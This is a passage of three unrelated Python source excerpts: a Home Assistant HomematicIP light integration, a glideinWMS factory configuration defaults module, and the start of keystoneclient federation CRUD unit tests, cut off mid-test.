            # One main light entity plus one entity per notification LED.
            entities.append(HomematicipLight(home, device))
            entities.append(HomematicipNotificationLight(
                home, device, device.topLightChannelIndex))
            entities.append(HomematicipNotificationLight(
                home, device, device.bottomLightChannelIndex))
        elif isinstance(device, dimmer_types):
            entities.append(HomematicipDimmer(home, device))

    if entities:
        async_add_entities(entities)
class HomematicipLight(HomematicipGenericDevice, Light):
    """Representation of a HomematicIP Cloud light device (simple on/off)."""

    # The previous __init__ only forwarded to super() with the same
    # arguments, so it was redundant and has been removed.

    @property
    def is_on(self):
        """Return true if device is on."""
        return self._device.on

    async def async_turn_on(self, **kwargs):
        """Turn the device on."""
        await self._device.turn_on()

    async def async_turn_off(self, **kwargs):
        """Turn the device off."""
        await self._device.turn_off()
class HomematicipLightMeasuring(HomematicipLight):
    """HomematicIP Cloud light that also reports power measurements."""

    @property
    def device_state_attributes(self):
        """Return state attributes, adding power/energy readings."""
        attr = super().device_state_attributes
        consumption = self._device.currentPowerConsumption
        # Suppress negligible readings below 0.05 W.
        if consumption > 0.05:
            attr[ATTR_POWER_CONSUMPTION] = round(consumption, 2)
        attr[ATTR_ENERGY_COUNTER] = round(self._device.energyCounter, 2)
        return attr
class HomematicipDimmer(HomematicipGenericDevice, Light):
    """Representation of HomematicIP Cloud dimmer light device."""

    # The previous __init__ only forwarded to super() with the same
    # arguments, so it was redundant and has been removed.

    @property
    def is_on(self):
        """Return true if device is on (dim level is non-zero)."""
        return self._device.dimLevel != 0

    @property
    def brightness(self):
        """Return the brightness of this light between 0..255."""
        return int(self._device.dimLevel*255)

    @property
    def supported_features(self):
        """Flag supported features."""
        return SUPPORT_BRIGHTNESS

    async def async_turn_on(self, **kwargs):
        """Turn the light on, honoring a requested brightness."""
        if ATTR_BRIGHTNESS in kwargs:
            # Home Assistant brightness is 0..255; device expects 0.0..1.0.
            await self._device.set_dim_level(kwargs[ATTR_BRIGHTNESS]/255.0)
        else:
            await self._device.set_dim_level(1)

    async def async_turn_off(self, **kwargs):
        """Turn the light off."""
        await self._device.set_dim_level(0)
class HomematicipNotificationLight(HomematicipGenericDevice, Light):
    """Representation of one notification LED channel (top or bottom) of a
    HomematicIP Cloud brand switch notification light."""
    def __init__(self, home, device, channel_index):
        """Initialize the notification light for one functional channel.

        channel_index 2 gets the 'Top' name suffix; anything else 'Bottom'.
        """
        self._channel_index = channel_index
        if self._channel_index == 2:
            super().__init__(home, device, 'Top')
        else:
            super().__init__(home, device, 'Bottom')
        from homematicip.base.enums import RGBColorState
        # Map the device's reduced color states to [hue, saturation] pairs
        # exposed via hs_color.
        self._color_switcher = {
            RGBColorState.WHITE: [0.0, 0.0],
            RGBColorState.RED: [0.0, 100.0],
            RGBColorState.YELLOW: [60.0, 100.0],
            RGBColorState.GREEN: [120.0, 100.0],
            RGBColorState.TURQUOISE: [180.0, 100.0],
            RGBColorState.BLUE: [240.0, 100.0],
            RGBColorState.PURPLE: [300.0, 100.0]
        }
    @property
    def _channel(self):
        # Functional channel backing this entity (the selected LED).
        return self._device.functionalChannels[self._channel_index]
    @property
    def is_on(self):
        """Return true if device is on."""
        return self._channel.dimLevel > 0.0
    @property
    def brightness(self):
        """Return the brightness of this light between 0..255."""
        return int(self._channel.dimLevel * 255)
    @property
    def hs_color(self):
        """Return the hue and saturation color value [float, float]."""
        simple_rgb_color = self._channel.simpleRGBColorState
        # Unknown device color states fall back to white.
        return self._color_switcher.get(simple_rgb_color, [0.0, 0.0])
    @property
    def device_state_attributes(self):
        """Return the state attributes of the generic device."""
        attr = super().device_state_attributes
        if self.is_on:
            attr[ATTR_COLOR_NAME] = self._channel.simpleRGBColorState
        return attr
    @property
    def name(self):
        """Return the name of the generic device."""
        return "{} {}".format(super().name, 'Notification')
    @property
    def supported_features(self):
        """Flag supported features."""
        return SUPPORT_BRIGHTNESS | SUPPORT_COLOR
    @property
    def unique_id(self) -> str:
        """Return a unique ID."""
        # NOTE(review): self.post appears to be the 'Top'/'Bottom' suffix
        # passed to super().__init__ — confirm against HomematicipGenericDevice.
        return "{}_{}_{}".format(self.__class__.__name__,
                                 self.post,
                                 self._device.id)
    async def async_turn_on(self, **kwargs):
        """Turn the light on."""
        # Use hs_color from kwargs,
        # if not applicable use current hs_color.
        hs_color = kwargs.get(ATTR_HS_COLOR, self.hs_color)
        simple_rgb_color = _convert_color(hs_color)
        # Use brightness from kwargs,
        # if not applicable use current brightness.
        brightness = kwargs.get(ATTR_BRIGHTNESS, self.brightness)
        # If no kwargs, use default value.
        if not kwargs:
            brightness = 255
        # Minimum brightness is 10, otherwise the led is disabled
        brightness = max(10, brightness)
        dim_level = brightness / 255.0
        await self._device.set_rgb_dim_level(
            self._channel_index,
            simple_rgb_color,
            dim_level)
    async def async_turn_off(self, **kwargs):
        """Turn the light off."""
        # Keep the current color; only drop the dim level to zero.
        simple_rgb_color = self._channel.simpleRGBColorState
        await self._device.set_rgb_dim_level(
            self._channel_index,
            simple_rgb_color, 0.0)
def _convert_color(color):
    """
    Convert the given [hue, saturation] color to the reduced RGBColorState.

    RGBColorState contains only 8 colors including white and black, so the
    hue is bucketed into 60-degree bands; low saturation maps to white.
    """
    from homematicip.base.enums import RGBColorState
    if color is None:
        return RGBColorState.WHITE
    hue = int(color[0])
    saturation = int(color[1])
    if saturation < 5:
        return RGBColorState.WHITE
    if 30 < hue <= 90:
        return RGBColorState.YELLOW
    if 90 < hue <= 160:
        return RGBColorState.GREEN
    # Was "150 < hue", which overlapped the GREEN band; GREEN always won
    # for 150-160 because it is tested first, so starting TURQUOISE at 160
    # preserves behavior while removing the overlap.
    if 160 < hue <= 210:
        return RGBColorState.TURQUOISE
    if 210 < hue <= 270:
        return RGBColorState.BLUE
    if 270 < hue <= 330:
        return RGBColorState.PURPLE
    return RGBColorState.RED
| |
#
# Project:
# glideinWMS
#
# File Version:
#
#   Description:
# This module contains the create_glidein params class
#
# Author:
# Igor Sfiligoi
#
import os
import copy
import sys
import os.path
import string
import socket
import types
import traceback
from glideinwms.lib import xmlParse
from glideinwms.lib import condorExe
import cWParams
######################################################
class GlideinParams(cWParams.CommonParams):
    """
    Contains all the factory configuration values as params. Used in create_glideins and recreate_glideins.
    """
    def init_defaults(self):
        """
        Populates the defaults for all the factory configuration values.
        Each default entry is a 4-tuple:
        (default value, type/format hint, help text, sub-defaults dict or None).
        """
        self.init_support_defaults()
        # Defaults for allowing frontends in a whitelist
        # in the factory config (per entry point)
        self.allow_defaults = cWParams.commentedOrderedDict()
        self.allow_defaults["name"] = (None, "string", "frontend name", None)
        self.allow_defaults["security_class"] = ("All", "string", "security class", None)
        # publishing specific to factory
        self.attr_defaults["publish"] = ("True", "Bool", "Should it be published by the factory?", None)
        self.attr_defaults["const"] = ("True", "Bool", "Should it be constant? (Else it can be overriden by the frontend. Used only if parameter is True.)", None)
        # Information system (RESS/BDII) reference defaults.
        self.infosys_defaults = cWParams.commentedOrderedDict()
        self.infosys_defaults["type"] = (None, "RESS|BDII", "Type of information system", None)
        self.infosys_defaults["server"] = (None, "host", "Location of the infosys server", None)
        self.infosys_defaults["ref"] = (None, "id", "Referenced for the entry point in the infosys", None)
        self.mongroup_defaults = cWParams.commentedOrderedDict()
        self.mongroup_defaults["group_name"] = (None, "groupname", "Name of the monitoring group", None)
        # Per-entry <config> defaults: job limits, restrictions, queue ops.
        entry_config_defaults = cWParams.commentedOrderedDict()
        entry_config_max_jobs_defaults = cWParams.commentedOrderedDict()
        max_jobs_per_entry_defaults = cWParams.commentedOrderedDict()
        max_jobs_per_entry_defaults["glideins"] = ('10000', "nr", "Maximum number of concurrent glideins (per entry) that can be submitted.", None)
        max_jobs_per_entry_defaults["idle"] = ('2000', "nr", "Maximum number of idle glideins (per entry) allowed.", None)
        max_jobs_per_entry_defaults["held"] = ('1000', "nr", "Maximum number of held glideins (per entry) before forcing the cleanup.", None)
        entry_config_max_jobs_defaults['per_entry'] = max_jobs_per_entry_defaults
        max_jobs_default_per_frontend_defaults = cWParams.commentedOrderedDict()
        max_jobs_default_per_frontend_defaults["glideins"] = ('5000', "nr", "Maximum number of concurrent glideins (default per frontend) that can be submitted.", None)
        max_jobs_default_per_frontend_defaults["idle"] = ('100', "nr", "Maximum number of idle glideins (default per frontend) allowed.", None)
        max_jobs_default_per_frontend_defaults["held"] = ('50', "nr", "Maximum number of held glideins (default per frontend) before forcing the cleanup.", None)
        entry_config_max_jobs_defaults['default_per_frontend'] = max_jobs_default_per_frontend_defaults
        max_jobs_per_frontend_defaults = cWParams.commentedOrderedDict()
        max_jobs_per_frontend_defaults["name"] = (None, "string", "frontend name", None)
        max_jobs_per_frontend_defaults["held"] = ('50', "nr", "Maximum number of held glideins (for this frontend) before forcing the cleanup.", None)
        max_jobs_per_frontend_defaults["idle"] = ('100', "nr", "Maximum number of idle glideins (for this frontend) allowed.", None)
        max_jobs_per_frontend_defaults["glideins"] = ('5000', "nr", "Maximum number of concurrent glideins (per frontend) that can be submitted", None)
        entry_config_max_jobs_defaults["per_frontends"] = (xmlParse.OrderedDict(), 'Dictionary of frontends', "Each frontend entry contains", max_jobs_per_frontend_defaults)
        entry_config_defaults['max_jobs'] = entry_config_max_jobs_defaults
        entry_config_restrictions_defaults=cWParams.commentedOrderedDict()
        entry_config_restrictions_defaults["require_voms_proxy"]=("False","Bool","Whether this entry point requires a voms proxy",None)
        entry_config_restrictions_defaults["require_glidein_glexec_use"]=("False","Bool","Whether this entry requires glidein to use glexec",None)
        entry_config_defaults['restrictions']=entry_config_restrictions_defaults
        # Shared template for the submit/remove/release schedd operations.
        # Values are lists (not tuples) so the deepcopied per-operation
        # variants below can override individual fields in place.
        entry_config_queue_defaults = cWParams.commentedOrderedDict()
        entry_config_queue_defaults["max_per_cycle"] = ['100', "nr", "Maximum number of jobs affected per cycle.", None]
        entry_config_queue_defaults["sleep"] = ['0.2', "seconds", "Sleep between interactions with the schedd.", None]
        entry_config_defaults['submit'] = copy.deepcopy(entry_config_queue_defaults)
        entry_config_defaults['submit']['cluster_size'] = ['10', "nr", "Max number of jobs submitted in a single transaction.", None]
        entry_config_defaults['submit']['slots_layout'] = ['fixed', "string", "The way multiple slots should be setup.", None]
        self.submit_attrs = cWParams.commentedOrderedDict()
        self.submit_attrs["value"] = ("All", "string", "HTCondor classad value", None)
        entry_config_defaults['submit']['submit_attrs'] = (xmlParse.OrderedDict(), 'Dictionary of submit attributes', "Each attribute contains", self.submit_attrs)
        entry_config_defaults['remove'] = copy.deepcopy(entry_config_queue_defaults)
        entry_config_defaults['remove']['max_per_cycle'][0] = '5'
        entry_config_defaults['release'] = copy.deepcopy(entry_config_queue_defaults)
        entry_config_defaults['release']['max_per_cycle'][0] = '20'
        # not exported and order does not matter, can stay a regular dictionary
        sub_defaults = {'attrs':(xmlParse.OrderedDict(), 'Dictionary of attributes', "Each attribute entry contains", self.attr_defaults),
                        'files':([], 'List of files', "Each file entry contains", self.file_defaults),
                        'infosys_refs':([], 'List of information system references', "Each reference points to this entry", self.infosys_defaults),
                        'monitorgroups':([], 'List of monitoring groups', "Each group entry belongs to", self.mongroup_defaults)}
        # Defaults for a single <entry> element.
        self.entry_defaults = cWParams.commentedOrderedDict()
        self.entry_defaults["gatekeeper"] = (None, 'gatekeeper', 'Grid gatekeeper/resource', None)
        self.entry_defaults["gridtype"] = ('gt2', 'grid_type', 'Condor Grid type', None)
        self.entry_defaults["trust_domain"] = ('OSG', 'trust_domain', 'Entry trust domain', None)
        self.entry_defaults["auth_method"] = ('grid_proxy', 'auth_method', 'Type of auth method this entry supports', None)
        self.entry_defaults["vm_id"] = (None, 'vm_id', 'VM id this entry supports', None)
        self.entry_defaults["vm_type"] = (None, 'vm_type', 'VM type this entry supports', None)
        self.entry_defaults["rsl"] = (None, 'RSL', 'Globus gt2 RSL option', None)
        self.entry_defaults['schedd_name'] = (None, "ScheddName", "Which schedd to use (Overrides the global one if specified)", None)
        self.entry_defaults["work_dir"] = (".", ".|Condor|OSG|TMPDIR", "Where to start glidein", None)
        self.entry_defaults['proxy_url'] = (None, 'proxy_url', "Squid cache to use", None)
        self.entry_defaults['verbosity'] = ('std', 'std|nodebug|fast', "Verbosity level and timeout setting", None)
        self.entry_defaults["enabled"] = ("True", "Bool", "Is this entry enabled?", None)
        self.entry_defaults["config"] = entry_config_defaults
        self.entry_defaults["attrs"] = sub_defaults['attrs']
        self.entry_defaults["files"] = sub_defaults['files']
        self.entry_defaults["infosys_refs"] = sub_defaults['infosys_refs']
        self.entry_defaults["monitorgroups"] = copy.deepcopy(sub_defaults['monitorgroups'])
        self.entry_defaults["allow_frontends"] = (xmlParse.OrderedDict(), 'Dictionary of frontends', "Each frontend entry contains", self.allow_defaults)
        ###############################
        # Start defining the defaults
        self.defaults["factory_name"] = (socket.gethostname(), 'ID', 'Factory name', None)
        self.defaults["glidein_name"] = (None, 'ID', 'Glidein name', None)
        self.defaults['schedd_name'] = ("schedd_glideins@%s" % socket.gethostname(), "ScheddName", "Which schedd to use, can be a comma separated list", None)
        self.defaults['factory_collector'] = (None, "CollectorName", "Which collector should we use for factory ClassAds", None)
        self.defaults['factory_versioning'] = ('True', 'Bool', 'Should we create versioned subdirectories?', None)
        # Submit-side directory layout (rooted under $HOME by default).
        submit_defaults = cWParams.commentedOrderedDict()
        submit_defaults["base_dir"] = ("%s/glideinsubmit" % os.environ["HOME"], "base_dir", "Submit base dir", None)
        submit_defaults["base_log_dir"] = ("%s/glideinlog" % os.environ["HOME"], "log_dir", "Submit base log dir", None)
        submit_defaults["base_client_log_dir"] = ("%s/glideclientlog" % os.environ["HOME"], "client_dir", "Base dir for client logs, needs a user_<uid> subdir per frontend user", None)
        submit_defaults["base_client_proxies_dir"] = ("%s/glideclientproxies" % os.environ["HOME"], "client_dir", "Base dir for client proxies, needs a user_<uid> subdir per frontend user", None)
        self.defaults["submit"] = submit_defaults
        # Retention template reused (deepcopied) by all log categories.
        one_log_retention_defaults = cWParams.commentedOrderedDict()
        one_log_retention_defaults["min_days"] = ["3.0", "days", "Min number of days the logs must be preserved (even if they use too much space)", None]
        one_log_retention_defaults["max_days"] = ["7.0", "days", "Max number of days the logs should be preserved", None]
        one_log_retention_defaults["max_mbytes"] = ["100.0", "Mbytes", "Max number of Mbytes the logs can use", None]
        monitor_footer_defaults=cWParams.commentedOrderedDict()
        monitor_footer_defaults["display_txt"] = ["", "string", "what will be displayed at the bottom of the monitoring page", None]
        monitor_footer_defaults["href_link"] = ["", "string", "where to link to", None]
        self.defaults["monitor_footer"] = monitor_footer_defaults
        process_log_defaults = copy.deepcopy(one_log_retention_defaults)
        process_log_defaults['extension'] = ["all", "string", "name of the log extention", None]
        process_log_defaults['msg_types'] = ["INFO, WARN, ERR", "string", "types of log messages", None]
        process_log_defaults['backup_count'] = ["5", "string", "Number of backup logs to keep", None]
        process_log_defaults['compression'] = ["", "string", "Compression for backup log files", None]
        log_retention_defaults = cWParams.commentedOrderedDict()
        log_retention_defaults["process_logs"] = ([], 'Dictionary of log types', "Each log corresponds to a log file", copy.deepcopy(process_log_defaults))
        log_retention_defaults["job_logs"] = copy.deepcopy(one_log_retention_defaults)
        log_retention_defaults["job_logs"]["min_days"][0] = "2.0"
        self.defaults['advertise_with_tcp'] = ('True', 'Bool', 'Should condor_advertise use TCP connections?', None)
        self.defaults['advertise_with_multiple'] = ('True', 'Bool', 'Should condor_advertise use -multiple?', None)
        log_retention_defaults["summary_logs"] = copy.deepcopy(one_log_retention_defaults)
        log_retention_defaults["summary_logs"]["max_days"][0] = "31.0"
        log_retention_defaults["condor_logs"] = copy.deepcopy(one_log_retention_defaults)
        log_retention_defaults["condor_logs"]["max_days"][0] = "14.0"
        self.defaults["log_retention"] = log_retention_defaults
        # Daemon loop timing and restart policy.
        self.defaults['loop_delay'] = ('60', 'seconds', 'Number of seconds between iterations', None)
        self.defaults['advertise_delay'] = ('5', 'NR', 'Advertize evert NR loops', None)
        self.defaults['restart_attempts'] = ('3', 'NR', 'Max allowed NR restarts every restart_interval before shutting down', None)
        self.defaults['restart_interval'] = ('1800', 'NR', 'Time interval NR sec which allow max restart attempts', None)
        self.defaults['entry_parallel_workers'] = ('0', 'NR', 'Number of entries that will perform the work in parallel', None)
        # Web-served staging area for glidein startup files.
        stage_defaults = cWParams.commentedOrderedDict()
        stage_defaults["base_dir"] = ("/var/www/html/glidefactory/stage", "base_dir", "Stage base dir", None)
        stage_defaults["web_base_url"] = ("http://%s/glidefactory/stage" % socket.gethostname(), 'base_url', 'Base Web server URL', None)
        stage_defaults["use_symlink"] = ("True", "Bool", "Can I symlink stage dir from submit dir?", None)
        self.defaults["stage"] = stage_defaults
        self.monitor_defaults["base_dir"] = ("/var/www/html/glidefactory/monitor", "base_dir", "Monitoring base dir", None)
        # Default for rrd update threads
        self.monitor_defaults["update_thread_count"]=(os.sysconf('SC_NPROCESSORS_ONLN'),"update_thread_count","Number of rrd update threads. Defaults to cpu count.",None)
        self.defaults["monitor"] = self.monitor_defaults
        # Frontend security mapping: identity -> security classes -> UNIX user.
        self.frontend_sec_class_defaults = cWParams.commentedOrderedDict()
        self.frontend_sec_class_defaults["username"] = (None, 'username', 'UNIX ID to be used for this security class', None)
        self.frontend_defaults = cWParams.commentedOrderedDict()
        self.frontend_defaults["identity"] = (None, 'identity', 'Authenticated Identity', None)
        self.frontend_defaults["security_classes"] = (xmlParse.OrderedDict(), "Dictionary of security class maps", "Each mapping contains", self.frontend_sec_class_defaults)
        monitoring_collector_defaults=cWParams.commentedOrderedDict()
        monitoring_collector_defaults["node"]=(None,"nodename","Factory monitoring collector node name (for example, col1.my.org:9999)",None)
        monitoring_collector_defaults["DN"]=(None,"dn","Factory collector distinguised name (subject) (for example, /DC=org/DC=myca/OU=Services/CN=col1.my.org)",None)
        monitoring_collector_defaults["secondary"]=("False","Bool","Secondary nodes will be used by glideins, if present",None)
        monitoring_collector_defaults["group"]=("default","string","Collector group name useful to group HA setup",None)
        self.defaults["monitoring_collectors"]=([],'List of factory monitoring collectors',"Each collector contains",monitoring_collector_defaults)
        # Security/key-management settings for frontend communication.
        security_default=cWParams.commentedOrderedDict()
        security_default["pub_key"]=("RSA","None|RSA","Type of public key system used for secure message passing",None)
        security_default["reuse_oldkey_onstartup_gracetime"]=("900","seconds","Time in sec old key can be used to decrypt requests from frontend",None)
        security_default["remove_old_cred_freq"] = ("24", "hours", "Frequency in hrs for cleaning unused credentials", None)
        security_default["remove_old_cred_age"] = ("30", "days", "Credentials older than this should be removed", None)
        security_default["key_length"]=("2048","bits","Key length in bits",None)
        security_default["frontends"]=(xmlParse.OrderedDict(),"Dictionary of frontend","Each frontend contains",self.frontend_defaults)
        self.defaults["security"] = security_default
        # Condor tarball descriptors used to stage the condor binaries.
        condor_defaults = cWParams.commentedOrderedDict()
        condor_defaults["os"] = ("default", "osname", "Operating System (like linux-rhel3)", None)
        condor_defaults["arch"] = ("default", "arch", "Architecture (like x86)", None)
        condor_defaults["version"] = ("default", "arch", "Architecture (like x86)", None)
        condor_defaults["tar_file"] = (None, "fname", "Tarball containing condor binaries (overrides base_dir if defined)", None)
        condor_defaults["base_dir"] = (None, "base_dir", "Condor distribution base dir (used only if tar_file undefined)", None)
        self.defaults["condor_tarballs"] = ([], 'List of condor tarballs', "Each entry contains", condor_defaults)
        self.defaults["attrs"] = sub_defaults['attrs']
        self.defaults["files"] = copy.deepcopy(sub_defaults['files'])
        # ordering is specific to global section of factory
        self.defaults["files"][3]["after_entry"] = ("False", 'Bool', 'Should this file be loaded after the entry ones?', None)
        self.defaults["entries"] = (xmlParse.OrderedDict(), "Dictionary of entries", "Each entry contains", self.entry_defaults)
        return
    # return name of top element
    def get_top_element(self):
        """Return the name of the top XML element ("glidein")."""
        return "glidein"
    def buildDir(self, factoryVersioning, basedir):
        """Return basedir, or basedir/glidein_<name> when versioning is on."""
        # return either basedir or basedir/frontend_fename
        glidein_subdir="glidein_%s"%self.glidein_name
        if factoryVersioning:
            return os.path.join(basedir, glidein_subdir)
        else:
            return basedir
    # validate data and add additional attributes if needed
    def derive(self):
        """Validate the parsed configuration and derive the stage/monitor/
        submit/log/client directories. Raises RuntimeError on any invalid
        name or identity.
        """
        # glidein name does not have a reasonable default
        if self.glidein_name is None:
            raise RuntimeError, "Missing glidein name"
        if not cWParams.is_valid_name(self.glidein_name):
            raise RuntimeError, "Invalid glidein name '%s'"%self.glidein_name
        if self.factory_collector=="default":
            raise RuntimeError, '"default" is a reserved keyword, cannot be used as factory_collector'
        factoryVersioning = False
        if self.data.has_key('factory_versioning') and \
               self.data['factory_versioning'].lower() == 'true':
            factoryVersioning = True
        self.stage_dir=self.buildDir(factoryVersioning, self.stage.base_dir)
        self.monitor_dir=self.buildDir(factoryVersioning, self.monitor.base_dir)
        self.submit_dir=self.buildDir(factoryVersioning, self.submit.base_dir)
        self.log_dir=self.buildDir(factoryVersioning, self.submit.base_log_dir)
        self.web_url=self.buildDir(factoryVersioning, self.stage.web_base_url)
        self.client_log_dirs={}
        self.client_proxies_dirs={}
        # Per-frontend, per-security-class client directories are always
        # versioned (buildDir called with True).
        for fename in self.security.frontends.keys():
            if not cWParams.is_valid_name(fename):
                raise RuntimeError, "Invalid frontend name '%s'"%fename
            if ' ' in self.security.frontends[fename].identity:
                raise RuntimeError, "Invalid frontend identity '%s'"%self.security.frontends[fename].identity
            for scname in self.security.frontends[fename].security_classes.keys():
                username=self.security.frontends[fename].security_classes[scname].username
                self.client_log_dirs[username]=self.buildDir(True, os.path.join(self.submit.base_client_log_dir,"user_%s"%username))
                self.client_proxies_dirs[username]=self.buildDir(True, os.path.join(self.submit.base_client_proxies_dir,"user_%s"%username))
        if not cWParams.is_valid_name(self.factory_name):
            raise RuntimeError, "Invalid factory name '%s'"%self.factory_name
        entry_names=self.entries.keys()
        for entry_name in entry_names:
            if not cWParams.is_valid_name(entry_name):
                raise RuntimeError, "Invalid entry name '%s'"%entry_name
        attr_names=self.attrs.keys()
        for attr_name in attr_names:
            if not cWParams.is_valid_name(attr_name):
                raise RuntimeError, "Invalid global attribute name '%s'."%attr_name
        for entry_name in entry_names:
            attr_names=self.entries[entry_name].attrs.keys()
            for attr_name in attr_names:
                if not cWParams.is_valid_name(attr_name):
                    raise RuntimeError, "Invalid entry '%s' attribute name '%s'."%(entry_name,attr_name)
    # return xml formatting
    def get_xml_format(self):
        """Describe which list/dict params map to which XML element names."""
        return {
            'lists_params':{
                'condor_tarballs':{'el_name':'condor_tarball', 'subtypes_params':{'class':{}}},
                'files':{'el_name':'file','subtypes_params':{'class':{}}},
                'process_logs':{'el_name':'process_log','subtypes_params':{'class':{}}},
                'monitorgroups':{'el_name':'monitorgroup','subtypes_params':{'class':{}}},
                'monitoring_collectors':{'el_name':'monitoring_collector','subtypes_params':{'class':{}}},
                'infosys_refs':{'el_name':'infosys_ref','subtypes_params':{'class':{}}}
            },
            'dicts_params':{
                'attrs':{'el_name':'attr','subtypes_params':{'class':{}}},
                'per_frontends':{'el_name':'per_frontend','subtypes_params':{'class':{}}},
                'entries':{'el_name':'entry','subtypes_params':{'class':{}}},
                'allow_frontends':{'el_name':'allow_frontend','subtypes_params':{'class':{}}},
                'frontends':{'el_name':'frontend','subtypes_params':{'class':{}}},
                'security_classes':{'el_name':'security_class','subtypes_params':{'class':{}}},
                'submit_attrs':{'el_name':'submit_attr','subtypes_params':{'class':{}}},
            }
        }
############################################################
#
# P R I V A T E - Do not use
#
############################################################
#####################################
# try to find out the base condor dir
def find_condor_base_dir():
    """Return the Condor distribution base dir, or None if unknown.

    Derived from the directory that holds the discovered condor binaries.
    """
    bin_path = condorExe.condor_bin_path
    if bin_path is None:
        return None
    return os.path.dirname(bin_path)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
from keystoneclient import access
from keystoneclient import exceptions
from keystoneclient import fixture
from keystoneclient.tests.unit.v3 import utils
from keystoneclient.v3.contrib.federation import base
from keystoneclient.v3.contrib.federation import identity_providers
from keystoneclient.v3.contrib.federation import mappings
from keystoneclient.v3.contrib.federation import protocols
from keystoneclient.v3 import domains
from keystoneclient.v3 import projects
class IdentityProviderTests(utils.TestCase, utils.CrudTests):
    """CRUD tests for OS-FEDERATION identity providers."""
    def setUp(self):
        super(IdentityProviderTests, self).setUp()
        # Keys used by the CrudTests mixin to build URLs and payloads.
        self.key = 'identity_provider'
        self.collection_key = 'identity_providers'
        self.model = identity_providers.IdentityProvider
        self.manager = self.client.federation.identity_providers
        self.path_prefix = 'OS-FEDERATION'
    def new_ref(self, **kwargs):
        """Return an identity provider reference with defaulted attributes."""
        kwargs.setdefault('id', uuid.uuid4().hex)
        kwargs.setdefault('description', uuid.uuid4().hex)
        kwargs.setdefault('enabled', True)
        return kwargs
    def test_positional_parameters_expect_fail(self):
        """Ensure CrudManager raises TypeError exceptions.
        After passing wrong number of positional arguments
        an exception should be raised.
        Operations to be tested:
            * create()
            * get()
            * list()
            * delete()
            * update()
        """
        POS_PARAM_1 = uuid.uuid4().hex
        POS_PARAM_2 = uuid.uuid4().hex
        POS_PARAM_3 = uuid.uuid4().hex
        PARAMETERS = {
            'create': (POS_PARAM_1, POS_PARAM_2),
            'get': (POS_PARAM_1, POS_PARAM_2),
            'list': (POS_PARAM_1, POS_PARAM_2),
            'update': (POS_PARAM_1, POS_PARAM_2, POS_PARAM_3),
            'delete': (POS_PARAM_1, POS_PARAM_2)
        }
        for f_name, args in PARAMETERS.items():
            self.assertRaises(TypeError, getattr(self.manager, f_name),
                              *args)
    def test_create(self, ref=None, req_ref=None):
        ref = ref or self.new_ref()
        # req_ref argument allows you to specify a different
        # signature for the request when the manager does some
        # conversion before doing the request (e.g. converting
        # from datetime object to timestamp string)
        req_ref = (req_ref or ref).copy()
        req_ref.pop('id')
        # Identity providers are created with PUT: the id is in the URL,
        # not in the request body.
        self.stub_entity('PUT', entity=ref, id=ref['id'], status_code=201)
        returned = self.manager.create(**ref)
        self.assertIsInstance(returned, self.model)
        for attr in req_ref:
            self.assertEqual(
                getattr(returned, attr),
                req_ref[attr],
                'Expected different %s' % attr)
        self.assertEntityRequestBodyIs(req_ref)
class MappingTests(utils.TestCase, utils.CrudTests):
    """CRUD tests for OS-FEDERATION attribute mappings."""
    def setUp(self):
        super(MappingTests, self).setUp()
        # Keys used by the CrudTests mixin to build URLs and payloads.
        self.key = 'mapping'
        self.collection_key = 'mappings'
        self.model = mappings.Mapping
        self.manager = self.client.federation.mappings
        self.path_prefix = 'OS-FEDERATION'
    def new_ref(self, **kwargs):
        """Return a mapping reference with a random id and two rules."""
        kwargs.setdefault('id', uuid.uuid4().hex)
        kwargs.setdefault('rules', [uuid.uuid4().hex,
                                    uuid.uuid4().hex])
        return kwargs
    def test_create(self, ref=None, req_ref=None):
        ref = ref or self.new_ref()
        # The mapping id travels in the URL (PUT), not in the request body,
        # so pop it from the kwargs passed to the manager.
        manager_ref = ref.copy()
        mapping_id = manager_ref.pop('id')
        # req_ref argument allows you to specify a different
        # signature for the request when the manager does some
        # conversion before doing the request (e.g. converting
        # from datetime object to timestamp string)
        req_ref = (req_ref or ref).copy()
        self.stub_entity('PUT', entity=req_ref, id=mapping_id,
                         status_code=201)
        returned = self.manager.create(mapping_id=mapping_id, **manager_ref)
        self.assertIsInstance(returned, self.model)
        for attr in req_ref:
            self.assertEqual(
                getattr(returned, attr),
                req_ref[attr],
                'Expected different %s' % attr)
        self.assertEntityRequestBodyIs(manager_ref)
class ProtocolTests(utils.TestCase, utils.CrudTests):
    """CRUD tests for federation protocols nested under identity providers."""
    def setUp(self):
        super(ProtocolTests, self).setUp()
        # Keys used by the CrudTests mixin to build URLs and payloads.
        self.key = 'protocol'
        self.collection_key = 'protocols'
        self.model = protocols.Protocol
        self.manager = self.client.federation.protocols
        self.path_prefix = 'OS-FEDERATION/identity_providers'
    def _transform_to_response(self, ref):
        """Rebuild dictionary so it can be used as a
        reference response body.
        """
        response = copy.deepcopy(ref)
        # The server returns 'id'; the client passes it as 'protocol_id'.
        response['id'] = response.pop('protocol_id')
        # identity_provider appears only in the URL, never in the body.
        del response['identity_provider']
        return response
    def new_ref(self, **kwargs):
        """Return a protocol reference with defaulted attributes."""
        kwargs.setdefault('mapping', uuid.uuid4().hex)
        kwargs.setdefault('identity_provider', uuid.uuid4().hex)
        kwargs.setdefault('protocol_id', uuid.uuid4().hex)
        return kwargs
    def build_parts(self, identity_provider, protocol_id=None):
        """Build array used to construct mocking URL.
        Construct and return array with URL parts later used
        by methods like utils.TestCase.stub_entity().
        Example of URL:
        ``OS-FEDERATION/identity_providers/{idp_id}/
        protocols/{protocol_id}``
        """
        parts = ['OS-FEDERATION', 'identity_providers',
                 identity_provider, 'protocols']
        if protocol_id:
            parts.append(protocol_id)
        return parts
    def test_build_url_provide_base_url(self):
        # An explicit base_url is used verbatim as the URL prefix.
        base_url = uuid.uuid4().hex
        parameters = {'base_url': base_url}
        url = self.manager.build_url(dict_args_in_out=parameters)
        self.assertEqual('/'.join([base_url, self.collection_key]), url)
    def test_build_url_w_idp_id(self):
        """Test whether kwargs ``base_url`` discards object's base_url
        This test shows, that when ``base_url`` is specified in the
        dict_args_in_out dictionary, values like ``identity_provider_id``
        are not taken into consideration while building the url.
        """
        base_url, identity_provider_id = uuid.uuid4().hex, uuid.uuid4().hex
        parameters = {
            'base_url': base_url,
            'identity_provider_id': identity_provider_id
        }
